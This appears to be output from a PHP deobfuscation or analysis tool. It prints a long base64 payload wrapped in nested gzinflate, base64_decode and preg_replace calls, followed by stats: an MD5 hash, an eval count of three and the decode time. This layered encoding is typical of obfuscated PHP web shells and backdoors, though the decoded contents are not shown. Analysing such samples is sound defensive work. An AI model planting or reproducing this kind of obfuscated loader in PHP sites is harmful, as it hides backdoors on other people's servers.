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'\x29\x29\x29\x3B",".");?>

Function Calls

gzinflate 2
preg_replace 1
base64_decode 2

Variables

None

Stats

MD5 fb845779266e5b55bff91599a22a449e
Eval Count 3
Decode Time 1460 ms